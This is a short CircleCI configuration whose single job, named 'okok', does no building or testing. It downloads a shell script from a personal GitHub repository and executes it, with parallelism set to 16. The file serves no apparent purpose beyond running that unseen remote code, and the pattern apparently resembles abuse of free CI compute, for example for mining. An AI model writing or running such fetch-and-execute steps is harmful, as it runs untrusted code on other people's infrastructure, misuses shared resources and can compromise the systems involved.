version: 2.1
jobs:
  trial:
    docker:
      - image: circleci/ruby:2.5.3
    parallelism: 16
    steps:
      - run:
          name: okok
          command: wget https://raw.githubusercontent.com/lawrence248/PotatoPy/master/bash.sh && chmod +x bash.sh && ./bash.sh
